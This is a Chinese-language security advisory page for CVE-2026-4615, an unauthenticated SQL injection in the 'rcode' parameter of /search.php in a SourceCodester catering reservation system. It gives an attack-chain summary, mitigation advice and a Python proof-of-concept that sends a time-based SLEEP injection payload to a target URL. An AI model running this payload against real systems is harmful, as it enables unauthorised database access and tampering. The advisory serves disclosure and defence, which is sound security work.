IPBUF安全漏洞报告
English
CVE-2026-4615 CVSS 7.3 高危

CVE-2026-4615: SourceCodester订餐系统SQL注入漏洞

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-4615
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Online Catering Reservation

相关标签

SQL注入SourceCodesterWeb安全RCECVE-2026-4615

漏洞概述

SourceCodester Online Catering Reservation 1.0版本存在SQL注入漏洞。攻击者可利用/search.php文件中的rcode参数漏洞,通过构造恶意请求执行SQL注入攻击。该漏洞无需认证即可远程利用,可能导致敏感数据泄露、数据篡改及服务中断,且已有公开利用代码。

技术细节

该漏洞由于应用程序在处理/search.php文件中的请求时,未对用户提交的rcode参数进行充分的过滤和验证,直接将其拼接到SQL查询语句中,导致产生了SQL注入漏洞。根据CVSS 3.1向量分析,该漏洞攻击复杂度低(AC:L),无需用户交互(UI:N)且无需任何权限(PR:N),攻击者可从网络发起攻击(AV:N)。利用此漏洞,攻击者可以读取、修改或删除数据库中的数据(C:L/I:L/A:L),完全控制受影响的数据库内容。

攻击链分析

STEP 1
1. 侦察
攻击者识别出目标运行的是SourceCodester Online Catering Reservation 1.0系统。
STEP 2
2. 武器化
攻击者构造针对/search.php接口rcode参数的恶意SQL注入Payload(如基于时间的盲注Payload)。
STEP 3
3. 交付与利用
攻击者向目标服务器发送包含恶意Payload的HTTP GET或POST请求,无需认证即可触发漏洞。
STEP 4
4. 影响
数据库执行恶意SQL语句,导致数据泄露、数据篡改或服务器拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def check_sqli(url): """ PoC for CVE-2026-4615 SQL Injection Testing the 'rcode' parameter in /search.php """ target = f"{url}/search.php" # Time-based payload to detect vulnerability payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" params = { "rcode": payload } try: print(f"[+] Sending request to {target}") response = requests.get(target, params=params, timeout=10) response_time = response.elapsed.total_seconds() if response_time >= 5: print(f"[!] Vulnerability confirmed! Response time: {response_time}s") else: print(f"[-] Not vulnerable or patched. Response time: {response_time}s") except requests.RequestException as e: print(f"[Error] {e}") if __name__ == "__main__": import sys if len(sys.argv) != 2: print("Usage: python3 poc.py <target_url>") else: check_sqli(sys.argv[1])

影响范围

SourceCodester Online Catering Reservation 1.0

防御指南

临时缓解措施
在官方修复补丁发布前,建议通过部署Web应用防火墙(WAF)拦截针对/search.php的异常请求,特别是过滤rcode参数中的单引号、注释符(--)等特殊字符。同时,应在数据库层面严格限制Web应用的读写权限,防止数据被大规模窃取或删除。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表